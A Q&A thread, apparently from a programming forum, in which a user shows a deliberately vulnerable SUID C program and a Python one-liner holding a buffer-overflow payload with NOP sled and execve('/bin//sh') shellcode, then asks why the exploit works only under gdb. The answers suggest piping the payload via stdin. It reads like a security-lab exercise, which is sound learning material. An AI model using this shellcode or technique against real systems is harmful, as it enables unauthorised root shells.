# Privilege escalation fails outside gdb

Tags: c, privilege-escalation, debugging

I have an application with the following source code:

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
```

Inside `bof` with the `strcpy(buffer, str)` i am trying to achieve privelege escalation using buffer overflow. Inside gdb with the following command i am able to open a new shell: `python -c 'print "A" * 24 + "\x60\xf1\xff\xbf" + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' > badfile` 
Outside gdb i know that the memory address change a bit so i have tried with the same command using some nops too: `python -c 'print "A" * 24 + "\x60\xf1\xff\xbf" + "\x90" * 30  + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' > badfile`  
I have disabled ASLR, NX bit and stack canary. Though the result of the last command above is `Illegal instruction (core dumped)`What am i doing wrong here? (The suid bit of the application as root is enabled)

Comment: the `fread` function does not NUL terminate the input buffer.  so the call to `strcpy()` in the bof() function will result in undefined behaviour and as you saw,  can lead to a seg fault event.  The code should check the returned value from `fread()` to know the length of the read in string, so amongst other things, can NUL terminate the string

Comment: overfowing a buffer is very unlikely to achieve a privilege escalation,  However it is very likely to result in a seg fault event

Comment: the `gdb` function has the memory layout a bit different so you might not see the seg fault event,  That does not mean the code isn't still causing undefined behaviour\

Comment: In gdb the memory map is different, so when you run the program the buffer overflow "does not work" like you wanted.

Answer (score 1):

You should familiarize yourself with the terminology. What you're trying to do has nothing to do with privilege escalation. What you want to do is code execution through buffer overflow.
I suggest you read the input for overflowing the buffer from stdin (gets), that is a lot more straightforward than reading it from a file. You can then do

```
python -c "<python encoded binary payload>" | yourprogram
```

That should do the trick.

Answer (score 0):

You can put the payload in a python program and invoke the code as `python payload.py; cat | /home/user/code`